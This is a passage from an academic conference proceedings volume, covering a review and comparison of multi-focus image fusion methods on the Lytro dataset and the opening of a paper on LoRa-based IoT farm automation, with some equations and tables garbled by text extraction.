opted for the robot’s balancing is a Linear Quadratic Regulator described briefly.
References
8. Stanese, M., Susca, M., Mihaly, V., & Nascu, I. (2020). Design and control of a self-balancing
robot. In 2020 IEEE International Conference on Automation, Quality and Testing, Robotics
(AQTR). https://doi.org/10.1109/aqtr49680.2020.9129935
9. Kolawole, E. S., Ali, W. H., Cofie, P., Fuller, J., Tolliver, C., & Obiomon, P. (2015). Design
and implementation of low-pass, high-pass and band-pass finite impulse response (FIR) filters
using FPGA. Circuits and Systems, 6, 30–48.
10. Gonzalez, C., Alvarado, I., Muñoz, P. D., & La,. (2017). Low cost two-wheels self-balancing
robot for control education. IFAC-PapersOnLine, 50(1), 9174–9179. https://doi.org/10.1016/
j.ifacol.2017.08.1729.
11. Ochala, I., Gbaorun, F., & Okeme, I. C. Department of Physics, Kogi State University, Anyigba
Department of Physics, Benue State University, Makurdi Design and implementation of a filter
for low-noise applications
12. Higgins, W. (1975). A comparison of complementary and Kalman filtering. IEEE Transactions
on Aerospace and Electronic Systems, AES-11(3), 321–325. https://doi.org/10.1109/taes.1975.
308081
13. Tang, S., Zhu, Q., Zhou, X., Liu, S., & Wu, M. (n.d.). A conception of digital agriculture.
In IEEE International Geoscience and Remote Sensing Symposium. https://doi.org/10.1109/
igarss.2002.1026858
14. Molnar, J., Gans, S., & Slavko, O. (2020). Design and implementation self-balancing robot.
In 2020 IEEE Problems of Automated Electrodrive. Theory and Practice (PAEP). https://doi.
org/10.1109/paep49887.2020.9240815
15. Conference on Advanced Intelligent Systems and Informatics 2018 Vol. 845 || Self-balancing
Robot Modeling and Control Using Two Degree of Freedom PID Controller. 10.1007/978-3-
319-99010-1(Chapter 6), 64–76. https://doi.org/10.1007/978-3-319-99010-16
Study and Performance Analysis
of Image Fusion Techniques
for Multi-focus Images
Abstract The primary objective behind image fusion technique is to collect and
integrate all the essential as well as relevant features and information in a solitary
image. In case of multi-focus image fusion technique, the procedure involves accu-
mulation of information out of the focused regions from the input images and final
combined outcome (image) will contain all the focused regions as well as objects.
There have been several studies in regard to multi-focus image fusion technique in
the area of spatial domain as well as transform domain. The issue of appearance of
non-focused regions or objects in an image happens due to limited depth of field of
the camera lens. As a result, objects present in the focused region of the camera lens
appears focused and others appear as un-focused. Image fusion technique is a scheme
to overcome this issue. In this paper, authors have reviewed recent fusion-based tech-
niques and tested certain image fusion techniques, i.e., discrete wavelet transform,
i.e., DWT, independent component analysis, in short, ICA, sparse representation, i.e.,
SR, dual-tree complex wavelet transform, i.e., DTCWT, non-subsampled contourlet
transform abbreviated as NSCT, and a hybrid of NSCT + SR, on Lytro multi-
focus image dataset and comparatively analyzed these methods on fusion metrics
nonlinear correlation information entropy (NCIE), normalized mutual information
(NMI), gradient-based metric(GBM), phase congruency-based metric (PCB). Anal-
ysis has demonstrated that NSCT + SR has given best performance results with a
NCIE of 0.842, NMI of 1.121, GBM of 0.759, and PCB of 0.848, while method SR
has given second best performance result. Authors have also elucidated regarding
the essential requirements to consider while framing any fusion-based scheme.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 247
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_20
248 V. Singh and V. D. Kaushik
Abbreviations
cA Coefficient of approximation
cH Horizontal component
cV Vertical component
cD Diagonal component
Limited depth of field of the camera creates hurdle in capturing all the objects at a
time under focus. This is the reason sometimes we don’t get a picture clicked focused
at all, i.e., picture possess some objects blurred or not focused [1–5]. This is the point
where need of multi-focus image fusion arises. Similarly, in medical field, there are
high-cost instrument machines to capture the modality of the human organs but it
has also its limitations as well as to avoid the high cost of the medical imaging,
fusion concept has a very important role to play here also as well so that the medical
practitioner and radiologist are able to diagnose a disease accurately [6, 7]. Fused
modality image will possess all the required pertinent information. Image fusion
application areas include microscopic imaging, medical imaging, remote sensing,
and geographical imaging [8–13].
A satellite is utilized to analyze and examine a remote location in remote sensing
area, for example, an area of earthquake is examined for the estimation and detec-
tion of damages. During research and development, it is found that in different
fields’ image processing also requires images with high resolution as well as spectral
images [14–16]. Therefore, images taken by various satellites, for example, SPOT
PAN, etc., undergo an image fusion procedure to get the high-resolution image [16–
19]. Different types of cameras capture different kinds of images, such as, infrared
cameras produce pictures to lie in infrared spectrum, while digital cameras produce
images to lie in visible spectrum. Both kinds of sensors produce images comple-
mentary to one another, such as, in case of surveillance purpose, better analysis can
be accompanied via both kind of image information. Therefore, concept of image
fusion plays a very important role for analysis and understanding purpose [20–22].
Application areas also include human perception, computer vision, and machine
perception, and image fusion concept also minimizes the cost of image transmission
[8, 23, 24]. Cost of image transmission is minimized via transmitting single fused
image in place of different images having different focus areas of similar scene.
Various image fusion schemes have been proposed in image processing research
Study and Performance Analysis … 249
FUSION
RULE
Combined Image
Source Image a, b
field [25–32]. In this research paper, authors have reviewed recent research papers
for multi-focus image fusion schemes and effectiveness has been evaluated with
performance metrics. Figure 1 illustrates the sample diagram for multi-focus image
fusion concept.
In the literature, different algorithms exist to execute image fusion model, where for
producing effective results certain conditions are needed to be followed [24, 33, 34]
as following:
• Important information from the source images should be preserved.
• Irrelevant information should be minimized or omitted from the fused image.
• Inconsistencies should not be the part of the fused image.
• Noise should be minimum or omitted from the final fused image.
Image fusion schemes are mainly classified in two main categories: Transform
domain as well as spatial domain [20, 35, 36]. Spatial domain fusion schemes are
implemented directly on the pixel values. Localized spatial features of images include
pixel or region in an image, and these are the main fusion pillars in case of spatial
domain fusion scheme [20, 32, 34, 37–52]. In spatial domain fusion procedure,
focused regions taken out of the input images are inhaled for consideration that may
250 V. Singh and V. D. Kaushik
be in terms of pixels or features depicting focused part of the image. There are focus
measures to categorize the input images focused regions, like, Laplacian energy as
well as spatial frequency. Spatial domain fusion schemes are moreover classified into
three categories such as: decision level fusion schemes, pixel-level fusion schemes,
and feature level fusion schemes [53–57].
In case of image fusion scheme relied on transform domain, transform coefficients
are generated out of the source images [18, 32]. Further, fusion of these coefficients
is accompanied to obtain final image coefficients and moreover inverse transform
is applied to get the final fused image. Transform domain-based fusion schemes
includes discrete cosine transform [58], wavelet transformation [29, 59, 60]. Trans-
form domain has better fusion capabilities as compared to spatial domain methods,
because, transform domain fusion schemes involve better representation of salient
features accurately as well as clearly. In terms of implementation, the kind of trans-
form technique is consumed, it may be categorized as, wavelet based fusion schemes
[24, 28, 59, 61–66], discrete cosine transform based fusion schemes [22, 58, 67, 68],
as and curvelet transform based fusion schemes [18, 66].
In DWT, here two input images are taken, wavelet transform is applied, further
coefficients are generated, and inverse of DWT is applied to produce final fused
image. In DWT, mainly two parts are generated: approximation part and detailed
part. For instance: [cA, cH, cV, cD] = dwt2(X,wname), it calculates the 2-D discrete
wavelet transform, abbreviated as DWT, at single level, where X denotes the input
data. And dwt2, wname returns the cA (approximation coefficients matrix) and cH,
cV, and as well as cD (detail coefficients matrices) representing horizontal, vertical,
and diagonal, consecutively.
Frequency domain is utilized here to fuse the images. Under this category, image
fusion methods based on average measures are considered. In case of advanced DCT
methodology, the enhanced version of the direct DCT-based image fusion model is
gained out of the DCT portrayal of the melded image by decomposition of images
further into blocks at that point computes portrayal of the DCT by considering the
average taken of the whole DCT portrayals for respective blocks. At last, by taking
the reverse discrete cosine transform the final fused image is gained. In reality, this
image fusion strategy is known as modified or “enhanced” DCT technique.
Study and Performance Analysis … 251
In this technique, each image is broken into low frequency components as well as
high-frequency components. As per the frequency components, two input images
are melded with each other via directive contrast in case of high frequency, more-
over stage congruency in case of low frequencies for the purpose of fusion process.
The final fused image is yielded after implying inverse non-subsampled contourlet
transform (inverse NSCT).
Sparse-based image fusion model works in the following manner. In this input image,
signals are reused as a straight line integration of a “certain” elements out of a
pre-trained dictionary, where the sparse coefficients demonstrate the input image
characteristics. Steps can be summarized as:
(i) Input images are broken down into overlapping patch segments, and every
patch is rewritten as a vector.
(ii) Sparse representation operation is done on input image patches via trained
dictionaries.
(iii) Apply some fusion method and fuse the sparse representation segments.
(iv) Produce the final fused output images with the help of their respective sparse
denotations.
3.6 DTCWT
A new fusion-based technique was evolved in [69] which were relied on DTCWT,
i.e., dual-tree complex wavelet transform. It had better advantages as compared to
traditional DWT in terms of shift invariance and directional selectivity.
252 V. Singh and V. D. Kaushik
3.7 ICA
ICA stands for independent component analysis [70]. In ICA-based image fusion
technique images were broken into ICA bases. Moreover, especially to break the
source images to create patches, sliding window technique was consumed, and
further, every patch was transformed into ICA domain. Further, transform coeffi-
cients were combined to generate the integrated patches. At last, final creation of
fused output image was fulfilled via calculating the average of overlapped image
patches.
4 Evaluation Metrics
Also known as evaluation metrics are utilized to assess the effectiveness of the fusion
techniques. Here, some of fusion metrics have been illustrated as:
A normalized mutual information metric was devised in [71] and it was enhanced
version of traditional MI metric, and it is given by following equation:
MI(P, F) MI(Q, F)
NMI = 2 + (1)
E(P) + E(F) E(Q) + E(F)
where E(P) depicts entropy of image P while MI(P, Q) illustrates the mutual infor-
mation in between images P and Q. Here, P, Q has been taken as two input images,
and F is taken as fused output image.
3
λa λa
NCIE = 1 + log256 (2)
a=1
3 3
This fusion metric is based on features of image and was proposed by [73]. With the
help of this metric, it is measured that how much extent of gradient information has
been transferred to fused output image out of the input images. Expression to denote
is as following:
H W
a=1 b=1 Q MF (i, j)w M
(i, j) + Q NF (i, j)w N (i, j)
GBM = H W
(4)
a=1 b=1 w M (i, j) + w N (i, j)
This metric was proposed by [74]. It is a kind of performance metric which is relied
on image features such as image phase congruency. Information about image edges
as well as corners is the important component of this PCB metric. This metric may be
expressed as the multiplication of three correlation coefficients and may be expressed
as:
i
PCB = Pp (PM ) j (Pm )k (5)
Illustrated as following:
Figure 3(a–d) shows graphical analysis of the comparative methods for NCIE, NMI,
GBM, and PCB, respectively. It is obvious from Fig. 3a–d that for NCIE, NMI,
GBM, PCB fusion metrics, the method NSCT + SR has shown best performance
results while SR has shown second best performance results out of the listed methods
in Table 1.
Study and Performance Analysis … 255
Fig. 3 a Comparative analysis via NCIE metric. b Comparative analysis via NMI metric.
c Comparative analysis via GBM metric. d Comparative analysis via PCB metric
Table 1 Comparative analysis for “image 5” from the Lytro Multi-focus dataset [75]
S. Metrics DWT ICA DTCWT SR NSCT NSCT+SR
No.
In this paper, authors have reviewed recent fusion-based techniques and tested
recent image fusion techniques, i.e., discrete wavelet transform (DWT), indepen-
dent component analysis (ICA), dual-tree complex wavelet transform (DTCWT),
sparse representation (SR), non-subsampled contourlet transform (NSCT), and
256 V. Singh and V. D. Kaushik
References
1. Xiao, B., Ou, G., Tang, H., Bi, X., & Li, W. (2020). Multi-focus image fusion by hessian
matrix-based decomposition. IEEE Transactions Multimedia, 22, 285–297.
2. Wan, T., Zhu, C., & Qin, Z. (2013). Multifocus image fusion based on robust principal
component analysis. Pattern Recognition Letter, 34, 1001–1008.
3. Guo, X., Nie, R., Cao, J., Zhou, D., Mei, L., & He, K. (2019). Fuse GAN: Learning to fuse multi-
focus image via conditional generative adversarial network. IEEE Transaction Multimedia, 21,
1982–1996.
4. Zhang, Q., & Guo, B.-L. (2009). Multifocus image fusion using the nonsubsampled contourlet
transform. IEEE Transactions on Signal Processing, 89, 1334–1346.
5. Kou, F., Wei, Z., Chen, W., Wu, X., Wen, C., & Li, Z. (2018). Intelligent detail enhancement
for exposure fusion. IEEE Transaction Multimedia, 20, 484–495.
6. Laganà, M. M., Preti, M. G., Forzoni, L., D’Onofrio, S., De Beni, S., Barberio, A., Pietro, C., &
Baselli, G. (2013). Transcranial ultrasound and magnetic resonance image fusion with virtual
navigator. IEEE Transaction Multimedia, 15, 1039–1048.
7. Wang, T., Chiu, C., Wu, W., Wang, J., Lin, C., Chiu, C., & Liou, J. (2015). Pseudo-multiple-
exposure-based tone fusion with local region adjustment. IEEE Transaction Multimedia, 17,
470–484.
8. Amin-Naji, M., & Aghagolzadeh, A. (2018). Multi-focus image fusion in DCT domain using
variance and energy of laplacian and correlation coefficient for visual sensor networks. Journal
of AI Data Mining, 6, 233–250.
9. Dou, W. (2018). Image degradation for quality assessment of pan-sharpening methods. Remote
Sensing, 10, 154.
10. Li, H., Jing, L., Tang, Y., & Wang, L. (2018). An image fusion method based on image
segmentation for high-resolution remotely-sensed imagery. Remote Sensing, 10, 790.
11. Li, Q., Yang, X., Wu, W., Liu, K., & Jeon, G. (2018). Multi-focus image fusion method for
vision sensor systems via dictionary learning with guided filter. Sensors, 18, 2143.
12. Cao, T., Dinh, A., Wahid, K. A., Panjvani, K., & Vail, S. (1887). Multi-focus fusion technique
on low-cost camera images for canola phenotyping. Sensors, 2018, 18.
13. Ganasala, P., & Kumar, V. (2014). Multimodality medical image fusion based on new features
in NSST domain. Biomedical Engineering Letters, 4, 414–424.
14. Du, J., Li, W., & Tan, H. (2019). Intrinsic image decomposition-based grey and pseudo-color
medical image fusion. IEEE Access, 7, 56443–56456.
15. Hu, H., Wu, J., Li, B., Guo, Q., & Zheng, J. (2017). An adaptive fusion algorithm for visible
and infrared videos based on entropy and the cumulative distribution of gray levels. IEEE
Transaction Multimedia, 19, 2706–2719.
Study and Performance Analysis … 257
16. Borsoi, R. A., Imbiriba, T., & Bermudez, J. C. M. (2020). Super-resolution for hyperspectral
and multispectral image fusion accounting for seasonal spectral variability. IEEE Transactions
on Image Processing, 29, 116–127.
17. Shao, Z., & Cai, J. (2018). Remote sensing image fusion with deep convolutional neural
network. SIEEE Journal of Selected Topics Application Earth Observation Remote Sensing,
11, 1656–1669.
18. Yang, B., & Li, S. (2010). Multifocus image fusion and restoration with sparse representation.
IEEE Transactions on Instrumentation and Measurement, 59, 884–892.
19. Merianos, I., & Mitianoudis, N. (2019). Multiple-exposure image fusion for HDR image
synthesis using learned analysis transformations. Journal of Imaging, 5, 32.
20. Liu, Y., Chen, X., Ward, R. K., & Wang, Z. J. (2016). Image fusion with convolutional sparse
representation. IEEE Transactions on Signal Processing, 23, 1882–1886.
21. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8, 131–142.
22. Kumar, B. K. S. (2013). Multifocus and multispectral image fusion based on pixel significance
using discrete cosine harmonic wavelet transform. Signal Image Video Process., 7, 1125–1143.
23. Rahman, M. A., Lin, S. C. F., Wong, C. Y., Jiang, G., Liu, S., & Kwok, N. (2016). Efficient
colour image compression using fusion approach. Imaging Science Journal, 64, 166–177.
24. Naidu, V. P. S., & Raol, J. R. (2008). Pixel-level image fusion using wavelets and principal
component analysis. Defence Science Journal, 58, 338–352.
25. Burt, P., & Adelson, E. (1983). The laplacian pyramid as a compact image code. IEEE
Transactions on Communications, 31, 532–540.
26. Adelson, E. H., Anderson, C. H., Bergen, J. R., Burt, P. J., & Ogden, J. M. (1984). Pyramid
methods in image processing. RCA Engineering, 29, 33–41.
27. Zhao, W., Lu, H., & Wang, D. (2018). Multisensor image fusion and enhancement in spectral
total variation domain. IEEE Transaction Multimedia, 20, 866–879.
28. Rockinger, O. (1997). Image sequence fusion using a shift-invariant wavelet transform. In
Proceedings of the International Conference on Image Processing (Vol. 3, pp. 288–291). Santa
Barbara.
29. Li, H., Manjunath, B., & Mitra, S. (1995). Multisensor image fusion using the wavelet
transform. Graphical Models Image Processing, 57, 235–245.
30. Tian, P., & Ni, G. (2009). Contrast-based image fusion using the discrete wavelet transform.
Optical Engineering, 39, 2075–2082.
31. Wang, W. W., Shui, P. L., & Feng, X. C. (2008). Variational models for fusion and denoising
of multifocus images. IEEE Transactions on Signal Processing, 15, 65–68.
32. Wan, T., Canagarajah, N., & Achim, A. (2009). Segmentation-driven image fusion based on
alpha-stable modeling of wavelet coefficients. IEEE Transactions Multimedia, 11, 624–633.
33. Liu, Y., Liu, S., & Wang, Z. (2015). Multi-focus image fusion with dense SIFT. Information
Fusion, 23, 139–155.
34. Nejati, M., Samavi, S., & Shirani, S. (2015). Multi-focus image fusion using dictionary-based
sparse representation. Information Fusion, 25, 72–84.
35. Liu, Z., Chai, Y., Yin, H., Zhou, J., & Zhu, Z. (2017). A novel multi-focus image fusion approach
based on image decomposition. Information Fusion, 35, 102–116.
36. Cao, L., Jin, L., Tao, H., Li, G., Zhuang, Z., & Zhang, Y. (2015). Multi-focus image fusion
based on spatial frequency in discrete cosine transform domain. IEEE Transactions on Signal
Processing, 22, 220–224.
37. He, K., Sun, J., & Tang, X. (2013). Guided image filtering. IEEE Transactions on Pattern
Analysis and Machine Intelligence, 35, 1397–1409.
38. Wright, J., Ma, Y., Mairal, J., Sapiro, G., Huang, T. S., & Yan, S. (2010). Sparse representation
for computer vision and pattern recognition. Proceedings of the IEEE, 98, 1031–1044.
39. Tropp, J. A. (2004). Greed is good: Algorithmic results for sparse approximation. IEEE
Transactions on Information Theory, 50, 2231–2242.
40. Qiu, X., Li, M., Zhang, L., & Yuan, X. (2019). Guided filter-based multi-focus image fusion
through focus region detection. Signal Processing Image Communication, 72, 35–46.
258 V. Singh and V. D. Kaushik
41. Li, S., Kang, X., & Hu, J. (2013). Image fusion with guided filtering. IEEE Transactions on
Image Processing, 22, 2864–2875.
42. Li, S., Kang, X., Hu, J., & Yang, B. (2013). Image matting for fusion of multi-focus images in
dynamic scenes. Information Fusion, 14, 147–162.
43. Wang, J., & Cohen, M. F. (2007). Image and video matting: A survey; foundations and trends
in computer graphics and vision (Vol. 3, pp. 97–175). Now Publishers Inc., Delft.
44. Shreyamsha Kumar, B. K. (2015). Image fusion based on pixel significance using cross bilateral
filter. Signal Image Video Processing, 9, 1193–1204.
45. Bai, X., Zhang, Y., Zhou, F., & Xue, B. (2015). Quadtree-based multi-focus image fusion using
a weighted focus-measure. Information Fusion, 22, 105–118.
46. Guo, D., Yan, J., & Qu, X. (2015). High quality multi-focus image fusion using self-similarity
and depth information. Optics Communication, 338, 138–144.
47. Qu, X., Hu, C., Yan, J. (2008) Image fusion algorithm based on orientation information moti-
vated pulse coupled neural networks. In Proceedings of the 7th World Congress on Intelligent
Control and Automation (pp. 2437–2441)
48. Qu, X.-B., Yan, J.-W., Xiao, H.-Z., & Zhu, Z.-Q. (2008). Image fusion algorithm based on spatial
frequency-motivated pulse coupled neural networks in nonsubsampled contourlet transform
domain. Acta Automation Sinica, 34, 1508–1514.
49. Zhang, Y., Bai, X., & Wang, T. (2017). Boundary finding based multi-focus image fusion
through multi-scale morphological focus-measure. Information Fusion, 35, 81–101.
50. Zhou, Z., Li, S., & Wang, B. (2014). Multi-scale weighted gradient-based fusion for multi-focus
images. Information Fusion, 20, 60–72.
51. Paul, S., Sevcenco, I. S., & Agathoklis, P. (2016). Multi-exposure and multi-focus image fusion
in gradient domain. Journal Circuits System Computer, 25, 1650123.
52. Farid, M. S., Mahmood, A., & Al-Maadeed, S. A. (2019). Multi-focus image fusion using
content adaptive blurring. Information Fusion, 45, 96–112.
53. Tao, Q., & Veldhuis, R. (2009). Threshold-optimized decision-level fusion and its application
to biometrics. Pattern Recognition, 42, 823–836.
54. Durrant-Whyte, H., & Henderson, T. C. (2008). Multisensor data fusion. Springer handbook
of robotics (pp. 585–610). Springer.
55. Varshney, P.K. (2000). Multisensor data fusion. Intelligent problem solving. In R. Palm, G. Ali
M. (Eds.). Methodologies and approaches; Logananthara (pp. 1–3). Springer.
56. Abhyankar, M., Khaparde, A., & Deshmukh, V. (2016). Spatial domain decision based image
fusion using superimposition. In Proceedings of the 2016 IEEE/ACIS 15th International
Conference on Computer and Information Science (ICIS) (pp. 1–6).
57. Liu, Y., & Wang, Z. (2015). Dense SIFT for ghost-free multi-exposure fusion. Journal of Visual
Communication and Image Representation, 31, 208–224.
58. Naidu, V., & Elias, B. (2013). A novel image fusion technique using DCT based Laplacian
Pyramid. International Journal of Invention Engineering Science (IJIES), 1, 1–9.
59. Tian, J., & Chen, L. (2012). Adaptive multi-focus image fusion using a wavelet-based statistical
sharpness measure. IEEE Transactions on Signal Processing, 92, 2137–2146.
60. Nunez, J. (1999). Multiresolution-based image fusion with additive wavelet decomposition.
IEEE Transactions on Geoscience and Remote Sensing, 37, 1204–1211.
61. Li, S., Kwok, J., & Wang, Y. (2001). Combination of images with diverse focuses using the
spatial frequency. Information Fusion, 2, 169–176.
62. Tian, J., Chen, L. (2010). Multi-focus image fusion using wavelet-domain statistics. In
Proceedings of the 2010 IEEE International Conference on Image Processing (pp. 1205–1208).
63. Liu, Y., Liu, S., & Wang, Z. (2015). A general framework for image fusion based on multi-scale
transform and sparse representation. Information Fusion, 24, 147–164.
64. Li, S., & Yang, B. (2008). Multifocus image fusion using region segmentation and spatial
frequency. Image and Vision Computing, 26, 971–979.
65. Li, S., Yang, B., & Hu, J. (2011). Performance comparison of different multi-resolution
transforms for image fusion. Information Fusion, 12, 74–84.
Study and Performance Analysis … 259
66. Li, S., & Yang, B. (2008). Multifocus image fusion by combining curvelet and wavelet
transform. Pattern Recognition Letter, 29, 1295–1301.
67. Haghighat, M. B. A., Aghagolzadeh, A., & Seyedarabi, H. (2011). Multi-focus image fusion for
visual sensor networks in DCT domain. Computers and Electrical Engineering, 37, 789–797.
68. Martorell, O., Sbert, C., & Buades, A. (2019). Ghosting-free DCT based multi-exposure image
fusion. Signal Processing Image Communication, 78, 409–425.
69. Kingsbury, N. (2000) The dual-tree complex wavelet transform with improved orthogo-
nality and symmetry properties. In Proceedings of IEEE International Conference on Image
Processing (ICIP) (pp. 375–378).
70. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8(2), 131–142.
71. Hossny, M., Nahavandi, S., & Creighton, D. (2008). Comments on information measure for
performance of image fusion. Electronics Letters, 44(18), 1066–1067.
72. Wang, Q., Shen, Y., & Zhang, J. (2005). A nonlinear correlation measure for multivariable data
set. Physica D: Nonlinear Phenomena, 200(3–4), 287–295.
73. Xydeas, C. S., & Petrovic, V. S. (2000). Objective image fusion performance measure.
Electronics Letters, 36(4), 308–309.
74. Zhao, J., Laganiere, R., & Liu, Z. (2007). Performance assessment of combinative pixel-level
image fusion based on an absolute feature measurement. International Journal of Innovative
Computing, Information and Control, 6(3), 1433–1447.
75. Lytro Multi-focus Image Dataset taken from, https://www.researchgate.net/publication/291522
937_Lytro_Multi-focus_Image_Dataset. Accessed on September 2020.
IoT-Based Agricultural Automation
Using LoRaWAN
Abstract Automation is the strategic placement of sensors, and the system responds
to various sensor readings in various situations. The practice of automation continues
to be widely adopted and integrated in health care, assembly line factory and other
major industries. However, in agriculture, most of the work is manual and effort
intensive. The farmers also do not have access to recommendations to make changes
to their method of operation to make the farming process cost conservative and more
efficient. The proposed system consists of edge devices and a central node. The edge
devices have an interfaced temperature and humidity sensor (DHT11) and moisture
sensor. The data collected by these sensors in all the edge devices is transmitted to the
central node via a long-range (LoRa) gateway. The LoRa wireless communication
technology is selected as it communicates in the 433 MHz ISM band which is not
monetarily charged by network providers and thus reduces data costs apart from
providing long-range communication capability in remote rural areas without much
network connectivity. The module used is the Ai-Thinker RA-02 LoRa module. The
central node transmits this collected data to a cloud-based database. AWS has been
used for the purposes of the current work. The system provides task automation such
as drip irrigation, and stored data can be run through an analytics engine to provide
farmers with insights regarding their practices and recommendations which increase
productivity and reduce operational costs.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 261
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_21
262 J. Chauhan et al.
1 Introduction
Water is one of the important factors for the survival and development of human
beings. Thus, water plays an important role in the process of agriculture. It also
affects the rate of economic development of the nation.
Patel [1] the availability of water for the irrigation will be comparatively less in the
future, i.e., by the year 2025 which is given by the International Water Management
Institute (IWMI). So, in the future in order to conserve water for agriculture, new
technologies are required to be implemented on the field. Currently, Internet of Things
(IoT) is emerging in almost all sectors. It not only covers agriculture but also a vast
region of sectors like transport, communication, industries, health care and many
more [2–5]. These days, sensors can be placed at the desired location or even worn
around the body to collect the input data [6]. There are use cases where sensors are
in moving state to collect data at different locations due to vast range of features
provided by wireless sensor nodes [7].
Current automated systems do include wireless communication between
connected devices and their interfaced sensors. However, this communication, as
it used to happen within infrastructure (buildings, factories, etc.), has been executed
mostly via 3G/4G communication technology that provides fast connectivity within
a closed structural infrastructure. However, since the system for agricultural automa-
tion is to operate outside in field, there are certain custom requirements accompa-
nying its implementation, such as the capability to function in areas with low network
coverage, transmit data over large distances in the open farmland and reduce costs,
as the sheer size of the farmland necessitates use of many units and cost per unit
should be low to make the overall system monetarily feasible to be implemented and
used.
Table 1 illustrates a comparison between various wireless data communication
technologies. As it is evident from the table, LoRa provides tangible benefits across
the board in terms of its low power consumption (which translates to lower operating
costs and bills associated with system runtime), comparatively low costs for system
setup and maintenance, longevity even when working via battery (due to its low
power consumption), highest possible operating range which extends up to several
kilometers theoretically. In actual practice, due to disturbances created by physical
obstructions such as trees, sheds and other similar infrastructure of an obstructive
nature, the range is tuned approximately to a kilometer. However, a similar impact is
observed in the range of other wireless technologies, and they undergo range reduc-
tion, ensuring that LoRa retains its position and provides for highest communicative
range for wireless communication. The other benefits in terms of no monetary charges
incurred for data transfer due to LoRa operating in ISM range and its independence
from connectivity requirements have been explored previously.
In the subsequent sections, the relevant aspects associated with the proposed
system design and implementation have been outlined. Section 2 consists of the liter-
ature review, and Sect. 3 presents the detailed design-related aspects of the proposed
system. The implementation and working of the system is described in Sects. 4 and
5 concludes the work with future work.
2 Literature Review
Semtech’s LoRa is considered for short-range devices, i.e., the SRD due to its elec-
tromagnetic transmission in the lower GHz band. For example, in India, for elec-
tromagnetic radio transmissions, 433MHz ISM band is utilized by Semtech’s LoRa.
Here, 2% duty cycle which is about 72s/hour in a normal scenario are constrained
to the transmitters. The total transmission time has a duty limit, however, just about
half. About 1% duty cycle is large enough to comply with the application needs and
devices to communicate.
For the current work, the Ai-Thinker RA-02 LoRa module has been used as it is
suitable for long-distance communications. The biggest benefit of this module is its
capability of performing all the required functionalities, at a low cost. LoRa modules
IoT-Based Agricultural Automation Using LoRaWAN 265
can be very expensive, depending on the specific module selected and its capabilities.
Certain modules may range above INR 30,000 but it is impractical to utilize these
due to monetary constraints, especially when the farmland may require many edge
devices, each outfitted with a LoRa module. Moreover, our target base, the farmers,
will not opt into the system if the associated costs are prohibitively large. Thus, a
cost effective alternative was provided in the form of RA-02 LoRa module.
Moreover, the most important consideration in the specifications is the frequency
range. The module provides low-power, long-range communication capabilities in
the 410–525 MHz frequency range. As the ISM band in India is 433MHz, this is
important. Communicate is preferred within this range to utilize the benefit of ISM
band communication, which incurs no monetary cost.
The product specifications of the RA-02 LoRa module are provided in Table 2
and 3 depicts the reception sensitivity of the Ai-Thinker Ra-02 radio module. Two
Table 3 Reception
Receive sensitivity
sensitivity specifications of
RA-02 LoRa module with Frequency Spread factor SNR Sensitivity
different frequencies 433 MHz 7 −7 −125
10 −15 −134
12 −20 −141
470 MHz 7 −7 −126
10 −15 −135
12 −20 −141
266 J. Chauhan et al.
working frequencies, 433MHz and 470MHz, have been compared in terms of the
spread factor, signal to noise ratio (SNR) and sensitivity.
The LoRa gateway acts as the central hub in the network. Many edge devices of
the network with their interfaced sensors collect data and collectively transmit the
same using LoRaWAN to the gateway. The gateway collects data from multiple edge
devices. This data can be transferred to a cloud storage facility if Internet connectivity
exists or can be accessed directly via the gateway without Internet connection access.
LoRa networks can include thousands of connected edge devices with many gateways
to cover enormous area. However, considering the practical implementation of this
system in agriculture in South–East Asian countries, such extensive capabilities are
not required. The farm area in these countries is much smaller than the farms in
developed countries (Farms in the US can span many thousands of acres of land
while farms in India have an average land area of merely two acres per farmer).
Thus, in the proposed system, a single gateway connected to multiple edge devices
has been used. The LoRa gateway of the current work could be classified as “single
connection” as it is built around the SX1276/78 IC which acts as the LoRa module.
There are many SX1276/78 radio modules available, and the Ai-Thinker SX128
RA-02 LoRa is used for the current work.
Figure 1 describes the connections for the LoRa gateway by using components
which are easily available and can be procured either online or through hardware
and electronic vendors. This makes the gateway easy to assemble with seamless
part replacement and reduces the costs associated with component procurement,
replacement and assembly. The software stack is entirely an open source: (a) the
Raspberry runs an ordinary Raspbian conveyance, (b) the long-range correspondence
library depends on the SX1272 library and (c) the program for LoRa gateway is kept as
basic as could reasonably be expected. The gateway was tested in various conditions
with a DHT11 sensor to monitor the humidity and temperature levels. Tests show
that the low-cost gateway can be installed in outdoor conditions with the appropriate
waterproof casing.
Figure 2 shows interfacing between the edge devices and the LoRa module. Two
Arduino boards are used, both acting as edge devices with interfaced sensors. The
edge devices each have an interfaced LoRa module and can engage in data transfer
from one to another. Both the edge devices connect to a common RPi-based central
node which puts their transmitted data into a cloud database. For the current work
specifically, a Dynamo DB service offered by Amazon Web Services (AWS) has
been used. Since edge devices do not require much computational power and are
performing comparatively simple operation such as receiving interfaced sensor inputs
and transmitting it via LoRa module at periodic intervals, Arduino UNO boards were
chosen for edge devices considering its lower cost and appropriate computational
power.
Figure 3 depicts the raspberry pi with interfaced DHT11 sensor for sensor cali-
bration and testing. Once DHT11 was calibrated, it was able to detect the ambient
temperature, the readings of which are shown in Fig. 4. Similarly, the moisture sensor
was also interfaced, calibrated and tested before being integrated into the edge device
The readings given by the Raspberry Pi gateway after reception from edge devices,
which have been transferred to the Dynamo DB created on the AWS Cloud Account,
are depicted in Fig. 4a and b depicts the graphical representation of soil moisture
reading (which can be obtained from Dynamo DB) on AWS. The results indicate
that the system is robust and functions appropriately even if drastic changes in the
system environment take place. In case of the soil moisture graph, when the soil
was intentionally flooded with water, the concordant response was recorded in form
of graph at 11:06 am, one minute after the spike was intentionally induced. Then,
on removal of the sensor from that environment, the readings were reflective of the
change as early as the minute after an action was performed at 11:06 am. Thus, it is
expected that the system will function appropriately when deployed on large scale
